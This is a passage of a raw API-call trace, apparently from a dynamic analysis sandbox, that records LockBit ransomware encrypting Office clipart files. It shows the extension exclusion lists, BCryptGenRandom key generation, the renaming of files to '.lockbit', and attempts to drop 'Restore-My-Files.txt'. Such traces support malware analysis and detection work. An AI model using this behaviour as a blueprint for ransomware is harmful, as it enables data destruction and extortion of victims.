lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.383] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.384] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.384] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01216_.WMF") returned 1 [0102.384] lstrcmpiW (lpString1="ntldr", lpString2="AN01216_.WMF") returned 1 [0102.384] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01216_.WMF") returned 1 [0102.384] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01216_.WMF") returned 1 [0102.384] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01216_.WMF") returned 1 [0102.385] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01216_.WMF") returned 1 [0102.385] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01216_.WMF") returned 1 [0102.385] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.385] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned=".WMF" [0102.385] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.385] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.385] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.386] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.386] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.lockbit") returned 72 [0102.386] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xf00 [0102.387] CreateIoCompletionPort (FileHandle=0xf00, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.387] malloc (_Size=0x40068) returned 0x1ff1e60 [0102.387] GetFileSizeEx (in: hFile=0xf00, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5836) returned 1 [0102.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0102.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.388] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0102.388] ReadFile (in: hFile=0xf00, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0102.458] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.458] malloc (_Size=0xa6) returned 0x3df0008 [0102.458] NtSetInformationFile (FileHandle=0xf00, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.459] free (_Block=0x3df0008) [0102.459] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.459] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.459] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa26000, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7fa26000, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01218_.WMF", cAlternateFileName="")) returned 1 [0102.459] lstrcmpiW (lpString1=".", lpString2="AN01218_.WMF") returned -1 [0102.459] lstrcmpiW (lpString1="..", lpString2="AN01218_.WMF") returned -1 [0102.459] PathFindExtensionW (pszPath="AN01218_.WMF") returned=".WMF" [0102.459] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.459] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.460] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.460] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="ntldr", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01218_.WMF") returned 1 [0102.461] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01218_.WMF") returned 1 [0102.461] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.461] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned=".WMF" [0102.461] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.461] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.461] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.462] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.462] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.lockbit") returned 72 [0102.462] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0102.463] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.463] malloc (_Size=0x40068) returned 0x3ef0008 [0102.464] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3012) returned 1 [0102.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0102.465] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.465] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0102.465] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0102.500] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0102.500] malloc (_Size=0xa6) returned 0x3df0008 [0102.500] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x3df0008, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0102.501] free (_Block=0x3df0008) [0102.501] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0102.501] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0102.501] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0102.501] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68bb3800, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x68bb3800, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN01251_.WMF", cAlternateFileName="")) returned 1 [0102.501] lstrcmpiW (lpString1=".", lpString2="AN01251_.WMF") returned -1 [0102.501] lstrcmpiW (lpString1="..", lpString2="AN01251_.WMF") returned -1 [0102.501] PathFindExtensionW (pszPath="AN01251_.WMF") returned=".WMF" [0102.501] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0102.501] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0102.502] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0102.502] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0102.503] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN01251_.WMF") returned 1 [0102.503] lstrcmpiW (lpString1="ntldr", lpString2="AN01251_.WMF") returned 1 [0102.503] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN01251_.WMF") returned 1 [0102.503] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN01251_.WMF") returned 1 [0102.504] lstrcmpiW (lpString1="autorun.inf", lpString2="AN01251_.WMF") returned 1 [0102.504] lstrcmpiW (lpString1="thumbs.db", lpString2="AN01251_.WMF") returned 1 [0102.504] lstrcmpiW (lpString1="iconcache.db", lpString2="AN01251_.WMF") returned 1 [0102.504] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0102.504] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned=".WMF" [0102.504] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0102.504] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0102.504] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0102.505] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0102.505] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.lockbit") returned 72 [0102.505] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c4 [0102.506] CreateIoCompletionPort (FileHandle=0x13c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0102.506] malloc (_Size=0x40068) returned 0x3d70048 [0102.507] GetFileSizeEx (in: hFile=0x13c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2756) returned 1 [0102.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0102.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0102.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0102.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0102.508] ReadFile (in: hFile=0x13c4, lpBuffer=0x3d7007c, 